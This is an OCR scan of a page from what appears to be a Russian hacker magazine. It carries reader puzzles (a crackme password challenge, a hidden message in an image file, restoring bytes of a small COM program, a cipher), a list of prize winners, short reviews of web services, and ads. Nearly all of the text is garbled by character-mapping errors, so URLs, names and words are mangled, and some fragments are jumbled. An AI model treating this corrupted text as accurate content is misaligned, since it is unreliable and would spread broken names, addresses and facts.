зовании функции зСгпсру (Ьиб , іприС , зСгІеп ( іприС ) ) : 
третьим параметром в ней должна стоять зігеоП (Ьиб). 




ПЕРВЫЙ ПАЗЛ «СЪЕШЬ МЕНЯ» 

Определи правильный пароль кпрограммееаіте.ехе. 
Программа написана наѴізиаІВазісб.О. 

Программу еаіте.ехе можно найти на диске кжурналу 
или на моем сайте ѵѵѵѵѵѵ.зкіѵагоі'бги . 



ІЧЕТВЕРТЫЙ ПАЗЛ «АВАВА»! 



Расшифруй: 



ВАААВАВААВАВАВАВАВВААААААВАААААВВ 

АВААВАВААВАВ 



ПЯТЫЙ ПАЗЛ «ЗАГАДОЧНОЕ 
УРАВНЕНИЕ»! 



Посмотри на примеры и определи, какое зна- 
чение должно стоять вместо знака вопроса в 
последнем уравнении: 



ВТОРОЙ ПАЗЛ «ПОСТЕР» 



Файл Наскегз.зрд (есть на диске, прилага- 
емом кжурналу) содержит скрытое сообщение: 
найди его и вышли мне. 




■третий пазТі^^^Ц 

«ВОССТАНОВИ БАЙТЬЬ>| 



На рисунке показана СОМ- 
программа (68 байт), которая 
должна просто выводить на 
экран фразу «КЕЗТОКЕ вутез 
ОЕ ТНІЗ ЕІЕЕ, РЕЕАЗЕ!». 
Восстанови три байта (на кар- 
тинке они замазаны красным 
цветом), чтобы программа 
работала правильно. 



ПРИЗЫ и ПОБЕДИТЕЛИ 

Объявляем победителей, отве- 
тивших на вопросы прошлого 
Х-ри 22 Іе. 

|1-е место^ затѵеі 
(заткагйріаѵзк.іиіа.пеі) 

2- е место: ѴІасіітігЗЬеІізІоѵ 
(з Ь е [і з1:оѵ_ѵ0 т а і [. ги ) 

3- е место: Алексей Цветков 
(хеепусЬйдтаіІ.сот) 



Победители этого месяца 
получат подписку на 
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ЛПКІІкІ 




► 1 


ВАСкир 

КДМППІ 


ІГІ 

, ^ 









ІП.Ч# Лі Мѵ I 



Е-^»ч-гЬтІЧ П»і» иД 
С-ГввЬѵгі^-' 



0ЮѴЕР5І0М 



ѴѴѴѴѴѴ.0ЮѴЕР5І0М.С0М 




РУТРІАСЕ 



Практика показывает, что новые версии программ далеко не всегда 
самые лучшие. Сколько уже было примеров, когда разработчик вдруг 
отказывался от полезной фичи в сторонуупрощения продукта. Или другой 
пример — привычный интерфейс вдруг меняют не в лучшую сторону. 
Причем, конечноже, с официального сайта дистрибутив старой версии 
исчезает, и если бы не сайт оШѵегзіоп. сот, то найти бы его врядли уда- 
лось. Атут— пожалуйста: даже 5куре 0.90Ье1:а-версии. 



ШѴѴ.РУТРІАСЕ.СОМ 



Когда я столкнулся с задачей бэкапа файлов сразу с нескольких компью-" 
теров, сразу же появился вопрос: а где эти бэкапы хранить? Поднимать 
специальный сервер для этого не хотелось, а подходящего онлайн 
хранилища попросту не было. На выручку пришел замечательный сервис 
РиіРІасе, который с помощью специального клиента автоматически 
создает резервные копии файлов с разных компьютеров, бесплатно пре- 
доставляя 2 Гбдискового пространства для их хранения онлайн. 




М0МІТ0РУ5 



М0М.ІТ0Р.У5 




Найти сегодня стабильный хостинг — задача на редкость сложная. Убе- 
диться в том, что сервера лежат даже у раскрученных хостеров, доста- 
точно просто, если установить за сайтом мониторинг. Для этого даже не 
обязательно устанавливать какую-либо прогу и пинговать сайт 24часа в 
сутки — за тебя все сделают мониторинг-сервисы, топ.ііог.из следит за 
120.000 сайтов, опрашивая их раз в 5 минутпо самым различным протоко- 
лам. Так что, предложение свалить от нерадивого хостера всегда поступит 
вовремя. 




Задача у этого хостера вполнетривиальная: он ищет картинки. Только 
делаетэто вовсе не потегам и не по контексту страницы, вместо этого он 
использует похожее изображение. То есть, имея какое-либо изображе-| 
ние, можно попробовать найти его в лучшем качестве, поискать нечто 
похожее или просто выяснить, откуда оно вообще взялось. Поисковик, 
наконец-то, закончил стадию закрытого бета-тестирования и сейчас^ 
доступен для всехжелающих. 
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рсОскіз 

східігюіз 

сНсйепде 

ѲО -- 



СЕІЕВРАТЕ ОРЮтАЫТѴ 



шпяі 



Только ПрСД'СТІІВЬІ 

Ф/гболки дііісІа-& с Твоим униквл^ьнь^ч диэвином а могээила)і асікіоів отіді^вІ5г 
Специальный показ твоик фут&олок на эвкрыюй вечеринке с учесгиеи' многой мслеимык эеезд. 
Ты СЭИ в Гериізнии иэ ивстер'хлассе лйиіих дизайнеров оііі^Іэо. 

Прояви оригинальность, унести^ в эРніоб огідіпеів сИэиепде! 

жжж.а(1Шэ50гідіпаІ5сЬаиепде.ги 







Нений клуб 









Карткл^і*'^ 



Мобильный мир 
на ѵѵар.те§а^оп.ги 

Скачивай игры, мелодии, картинки 
и видео на ѴѴАР-портале МегаФона. 

Для доступа к ѴѴАР-порталу отправьте 
5М5 на бесплатный номер 1115. 



Подробности - В точках продаж и на сайте ѵѵѵѵѵѵ.тедаГоп.ш. 
Лицензия №№ 57759, 50788, 44200, 32829, 32828, 15002, 41542, 
41541, 15411, 28394, 28393, 10010, 54059, 54058, 15412, 47183, 
47184, 20377, 28040, 28066, 16338, 39500, 53201, 15410, 28390, 
28391 Министерства РФ по связи и информатизации. 

Реклама. 



(5) МЕГАФОН 

Будущее зависит от тебя 




